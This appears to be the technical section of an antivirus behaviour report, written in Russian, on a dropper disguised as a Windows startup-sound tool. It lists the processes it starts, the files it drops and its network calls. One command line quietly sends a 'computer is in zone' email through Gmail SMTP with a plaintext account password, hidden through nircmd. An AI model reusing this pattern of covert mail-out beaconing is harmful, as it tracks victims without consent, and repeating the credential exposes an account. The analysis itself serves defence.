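Техническая информация (по порядку: командные строки процессов, пути затрагиваемых файлов, сетевые обращения, классы окон)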
- '%TEMP%\RarSFX1\sendmail.exe'
- '%TEMP%\RarSFX1\senditquiet.exe' -f djfake512@gmail.com -t djfake512@gmail.com -s smtp.gmail.com -port 587 -protocol ssl -u djfake512@gmail.com -p @qwerty@512 -subject "Startup sound from %USERNAME%" -body "%USERNAME% is using Windows Startup Sound Organizer (v1.02). The computer is in zone."
- '%TEMP%\RarSFX1\nircmd.exe' exec hide "sendmail.exe"
- '%TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe'
- '%TEMP%\RarSFX0\sendmail.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX1\starter.bat" "
- '<SYSTEM32>\xcopy.exe' P19.wav "%WINDIR%\Media\" /y
- '<SYSTEM32>\xcopy.exe' nircmd.exe "<SYSTEM32>\" /y
- %TEMP%\RarSFX1\starter.bat
- %TEMP%\RarSFX1\sendmail.exe
- %WINDIR%\Media\P19.wav
- %TEMP%\0RTM36L5.bat
- %TEMP%\RarSFX1\senditquiet.exe
- %TEMP%\RarSFX1\nircmd.exe
- %TEMP%\RarSFX0\P19.wav
- %TEMP%\RarSFX0\nircmd.exe
- %TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe
- <SYSTEM32>\nircmd.exe
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\sendmail.exe
- %TEMP%\0RTM36L5.bat
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\nircmd.exe
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe
- %TEMP%\RarSFX0\P19.wav
- %TEMP%\RarSFX0\sendmail.exe
- %TEMP%\RarSFX1\sendmail.exe
- %TEMP%\RarSFX1\senditquiet.exe
- %TEMP%\0RTM36L5.bat
- %TEMP%\RarSFX1\nircmd.exe
- 'sm##.gmail.com':587
- DNS ASK sm##.gmail.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'